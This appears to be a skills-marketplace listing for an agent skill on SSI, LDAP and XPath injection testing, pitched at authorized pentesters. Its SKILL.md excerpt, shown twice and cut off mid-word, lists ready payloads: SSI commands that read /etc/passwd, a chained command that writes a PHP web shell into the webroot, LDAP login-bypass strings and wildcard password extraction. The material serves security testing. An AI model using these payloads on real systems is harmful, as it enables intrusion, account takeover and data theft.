Injection Checking

Name: Injection Checking
Author: yaklang

yaklang/hack-skills

Install this when you pentest or harden legacy stacks that still expose SSI, LDAP, or XPath injection surfaces beyond common SQL and XSS checks.

Overview

Injection-checking (extra types) is an agent skill for the Ship phase that guides detection and proof patterns for SSI, LDAP, and XPath injection in targeted stacks.

Install

npx skills add https://github.com/yaklang/hack-skills --skill injection-checking

What is this skill?

SSI injection probes with  and  confirmation flow
Documents Apache mod_include, Nginx ssi on, and IIS prerequisites for exploitable SSI contexts
Key payloads for virtual/file include and chained file-write command execution scenarios
Companion depth for LDAP and XPath injection types referenced alongside core injection-checking skill
Structured detection-first workflow: inject directive, observe echo, then escalate to exec/include proofs
3 extra injection families: SSI, LDAP, XPath in companion doc

Compatible agents: Claude Code, Cursor, Codex, any compatible agent

Adoption & trust: 1.1k installs on skills.sh; 980 GitHub stars; 1/3 security scanners passed (skills.sh audits).

What problem does it solve?

Your security pass covers SQL and XSS but you lack agent-ready probes for SSI includes and related legacy injection channels on Apache, Nginx, or IIS.

Who is it for?

Indie hackers and builders doing authorized reviews on mixed legacy web apps with SSI-enabled pages or directory-backed auth.

Skip if: Greenfield APIs with no server-side includes, teams without written permission to test, or beginners who need general OWASP Top 10 primers only.

When should I use this skill?

When auditing apps for SSI, LDAP, or XPath injection after standard SQL/XSS checks or when the stack uses includes, directory queries, or XPath APIs.

What do I get? / Deliverables

You get reproducible detection steps and payload categories for SSI (and companion LDAP/XPath coverage) so findings are confirmed before remediation tickets.

Documented injection test cases and confirmed vulnerable parameters
Remediation notes tied to server SSI or directory configuration

Recommended Skills

Azure Compliancemicrosoft/azure-skills

Azure Compliance is a Microsoft agent skill for solo builders and small teams who need structured security and complianc…373k installs·1.2k stars

Openclaw Secure Linux Cloudxixu-me/skills

OpenClaw Secure Linux Cloud guides a hardened VPS deployment—rootless Podman, loopback-only gateway, SSH-tunneled Contro…201k installs·61 stars

Entra Agent Idmicrosoft/azure-skills

entra-agent-id is a Microsoft-authored agent skill for provisioning and operating OAuth-capable identities tailored to A…99.1k installs·1.2k stars

Firebase Security Rules Auditorfirebase/agent-skills

Firebase Security Rules Auditor turns your agent into a senior penetration-style reviewer for Firestore rulesets. Solo b…40.3k installs·345 stars

Firestore Security Rules Auditorfirebase/agent-skills

Firestore-security-rules-auditor is a checker skill for solo builders and small teams shipping Firebase-backed apps who …20.3k installs·345 stars

Skill Vetteruseai-pro/openclaw-skills-security

Skill Vetter is a security-first OpenClaw agent skill that makes your coding agent behave like a pre-install auditor for…19.2k installs·62 stars

Journey fit

Primary fit

Injection verification belongs in Ship → security before production exposure or after major template and directory integrations. Content covers offensive detection payloads and server prerequisites—classic appsec testing, not feature build or launch SEO.

How it compares

Specialized injection payloads for SSI and niche parsers—not a full vulnerability scanner or compliance certification skill.

Common Questions / FAQ

Who is injection-checking for?

Solo builders and security-minded developers running authorized tests in Claude Code or Cursor on apps that may still parse SSI, LDAP, or XPath inputs.

When should I use injection-checking?

During Ship → security before launch on legacy hosts, after enabling SSI or directory search features, or when validating a suspected include or XPath injection report.

Is injection-checking safe to install?

The skill describes offensive testing patterns—use only on systems you own or are allowed to test; review the Security Audits panel on this Prism page for the parent repo.

SKILL.md

READMESKILL.md - Injection Checking

# Extra Injection Types — SSI, LDAP, XPath

> Companion to [SKILL.md](./SKILL.md). Covers injection types that are less common in modern web apps but still appear in specific technology stacks.

---

## 1. SSI Injection (Server-Side Includes)

### Mechanism

SSI directives are parsed by the web server (Apache, Nginx, IIS) before sending the response. If user input is embedded in `.shtml` or SSI-enabled pages without sanitization:

```
<!--#exec cmd="id"-->
<!--#include virtual="/etc/passwd"-->
```

### Detection

```text
# Probe: inject SSI directive in form field, URL param, or header:
<!--#echo var="DATE_LOCAL"-->

# If response contains the current date → SSI is active and input is parsed

# Confirm command execution:
<!--#exec cmd="id"-->
```

### Prerequisites

- Apache with `mod_include` and `Options +Includes`
- File extension `.shtml` or `AddOutputFilter INCLUDES .html`
- Nginx with `ssi on;` in location block
- IIS with SSI feature installed

### Key Payloads

```text
# Command execution:
<!--#exec cmd="id"-->
<!--#exec cmd="cat /etc/passwd"-->
<!--#exec cmd="ls -la"-->

# File include:
<!--#include virtual="/etc/passwd"-->
<!--#include file="config.php"-->

# Variable echo (safe probe):
<!--#echo var="DOCUMENT_ROOT"-->
<!--#echo var="SERVER_SOFTWARE"-->
<!--#echo var="REMOTE_ADDR"-->

# Chained with file write:
<!--#exec cmd="echo '<?php system($_GET[c]);?>' > /var/www/html/shell.php"-->
```

### Nginx SSI Configuration

```nginx
location / {
    ssi on;
    ssi_types text/shtml;
}
```

### Real-World Case: SSI via File Upload

Upload a file named `shell.shtml` with SSI directives:
```text
<!--#exec cmd="whoami"-->
```

If the web server processes `.shtml` files → command executes on page load.

### Where to Test

- Guest books, comment systems, forums
- Error pages that include user input
- Any `.shtml` endpoint accepting user data
- File upload → upload `.shtml` file with SSI directives

---

## 2. LDAP Injection

### Mechanism

LDAP queries use a filter syntax. When user input is concatenated into filters without sanitization:

```
Original:  (&(uid=USER_INPUT)(password=PASS_INPUT))
Injection: (&(uid=admin)(|(password=*)(1=1)))(password=anything))
```

### Detection

```text
# Authentication bypass — classic:
Username: admin)(&)
Password: anything
# Filter becomes: (&(uid=admin)(&))(password=anything))
# The (&) always evaluates to TRUE

# OR injection:
Username: *)(uid=*))(|(uid=*
Password: anything
# Lists all users
```

### Common Filter Patterns

```text
# Search filter: (&(cn=INPUT)(objectClass=person))
# Auth filter:   (&(uid=INPUT)(userPassword=INPUT2))

# Metacharacters:
*   — wildcard (matches anything)
()  — grouping
&   — AND
|   — OR
!   — NOT
```

### Exploitation Scenarios

#### Authentication Bypass — Null Byte Truncation

```text
# When passwords are hashed (common in OpenLDAP):
Username: admin%00                 # URL-encoded null byte
# In Burp, change %2500 to %00 (actual null byte)
# LDAP query: (&(uid=admin\00)(userPassword=...))
# Null byte truncates the filter → password check skipped
```

#### Authentication Bypass — Wildcard and Logic

```text
# Simple wildcard:
Username: *
Password: *
# If filter: (&(uid=*)(userPassword=*)) → matches ALL entries

# Logic closure:
Username: zhang)(|(& 
Password: 1
# Filter becomes: (&(uid=zhang)(|(&)(userpassword=1))) → always TRUE
```

#### Authentication Bypass — Alternative Closures

```text
# Username: admin)(!(&(1=0))
# Password: anything
# Result: (&(uid=admin)(!(&(1=0)))(password=anything))
# The !(&(1=0)) = !(FALSE) = TRUE → bypasses password check
```

#### Data Extraction via Wildcard

```text
# Enumerate attributes character by character:
(&(uid=admin)(password=a*))  → invalid → password doesn't start with 'a'
(&(uid=admin)(password=b*))  → invalid
(&(uid=admin)(password=s*))  → valid! → password starts with 's'
(&(uid=admin)(password=se*)) → valid! → second char is 'e'
...
# Continue until full password is extracted
```

#### OR Filter Injectio

What is this skill?

SSI injection probes with  and  confirmation flow

Documents Apache mod_include, Nginx ssi on, and IIS prerequisites for exploitable SSI contexts

Key payloads for virtual/file include and chained file-write command execution scenarios

Companion depth for LDAP and XPath injection types referenced alongside core injection-checking skill

Structured detection-first workflow: inject directive, observe echo, then escalate to exec/include proofs

3 extra injection families: SSI, LDAP, XPath in companion doc

Compatible agents: Claude Code, Cursor, Codex, any compatible agent

Adoption & trust: 1.1k installs on skills.sh; 980 GitHub stars; 1/3 security scanners passed (skills.sh audits).

Journey fit

Primary fit

SKILL.md

READMESKILL.md - Injection Checking

# Extra Injection Types — SSI, LDAP, XPath

> Companion to [SKILL.md](./SKILL.md). Covers injection types that are less common in modern web apps but still appear in specific technology stacks.

---

## 1. SSI Injection (Server-Side Includes)

### Mechanism

SSI directives are parsed by the web server (Apache, Nginx, IIS) before sending the response. If user input is embedded in `.shtml` or SSI-enabled pages without sanitization:

```
<!--#exec cmd="id"-->
<!--#include virtual="/etc/passwd"-->
```

### Detection

```text
# Probe: inject SSI directive in form field, URL param, or header:
<!--#echo var="DATE_LOCAL"-->

# If response contains the current date → SSI is active and input is parsed

# Confirm command execution:
<!--#exec cmd="id"-->
```

### Prerequisites

- Apache with `mod_include` and `Options +Includes`
- File extension `.shtml` or `AddOutputFilter INCLUDES .html`
- Nginx with `ssi on;` in location block
- IIS with SSI feature installed

### Key Payloads

```text
# Command execution:
<!--#exec cmd="id"-->
<!--#exec cmd="cat /etc/passwd"-->
<!--#exec cmd="ls -la"-->

# File include:
<!--#include virtual="/etc/passwd"-->
<!--#include file="config.php"-->

# Variable echo (safe probe):
<!--#echo var="DOCUMENT_ROOT"-->
<!--#echo var="SERVER_SOFTWARE"-->
<!--#echo var="REMOTE_ADDR"-->

# Chained with file write:
<!--#exec cmd="echo '<?php system($_GET[c]);?>' > /var/www/html/shell.php"-->
```

### Nginx SSI Configuration

```nginx
location / {
    ssi on;
    ssi_types text/shtml;
}
```

### Real-World Case: SSI via File Upload

Upload a file named `shell.shtml` with SSI directives:
```text
<!--#exec cmd="whoami"-->
```

If the web server processes `.shtml` files → command executes on page load.

### Where to Test

- Guest books, comment systems, forums
- Error pages that include user input
- Any `.shtml` endpoint accepting user data
- File upload → upload `.shtml` file with SSI directives

---

## 2. LDAP Injection

### Mechanism

LDAP queries use a filter syntax. When user input is concatenated into filters without sanitization:

```
Original:  (&(uid=USER_INPUT)(password=PASS_INPUT))
Injection: (&(uid=admin)(|(password=*)(1=1)))(password=anything))
```

### Detection

```text
# Authentication bypass — classic:
Username: admin)(&)
Password: anything
# Filter becomes: (&(uid=admin)(&))(password=anything))
# The (&) always evaluates to TRUE

# OR injection:
Username: *)(uid=*))(|(uid=*
Password: anything
# Lists all users
```

### Common Filter Patterns

```text
# Search filter: (&(cn=INPUT)(objectClass=person))
# Auth filter:   (&(uid=INPUT)(userPassword=INPUT2))

# Metacharacters:
*   — wildcard (matches anything)
()  — grouping
&   — AND
|   — OR
!   — NOT
```

### Exploitation Scenarios

#### Authentication Bypass — Null Byte Truncation

```text
# When passwords are hashed (common in OpenLDAP):
Username: admin%00                 # URL-encoded null byte
# In Burp, change %2500 to %00 (actual null byte)
# LDAP query: (&(uid=admin\00)(userPassword=...))
# Null byte truncates the filter → password check skipped
```

#### Authentication Bypass — Wildcard and Logic

```text
# Simple wildcard:
Username: *
Password: *
# If filter: (&(uid=*)(userPassword=*)) → matches ALL entries

# Logic closure:
Username: zhang)(|(& 
Password: 1
# Filter becomes: (&(uid=zhang)(|(&)(userpassword=1))) → always TRUE
```

#### Authentication Bypass — Alternative Closures

```text
# Username: admin)(!(&(1=0))
# Password: anything
# Result: (&(uid=admin)(!(&(1=0)))(password=anything))
# The !(&(1=0)) = !(FALSE) = TRUE → bypasses password check
```

#### Data Extraction via Wildcard

```text
# Enumerate attributes character by character:
(&(uid=admin)(password=a*))  → invalid → password doesn't start with 'a'
(&(uid=admin)(password=b*))  → invalid
(&(uid=admin)(password=s*))  → valid! → password starts with 's'
(&(uid=admin)(password=se*)) → valid! → second char is 'e'
...
# Continue until full password is extracted
```

#### OR Filter Injectio

Overview

Install

What is this skill?

What problem does it solve?

Who is it for?

When should I use this skill?

What do I get? / Deliverables

Recommended Skills

Journey fit

Who is injection-checking for?

When should I use injection-checking?

Is injection-checking safe to install?

SKILL.md

This week for builders

Overview

Install

What is this skill?

What problem does it solve?

Who is it for?

When should I use this skill?

What do I get? / Deliverables

Recommended Skills

Journey fit

Who is injection-checking for?

When should I use injection-checking?

Is injection-checking safe to install?

SKILL.md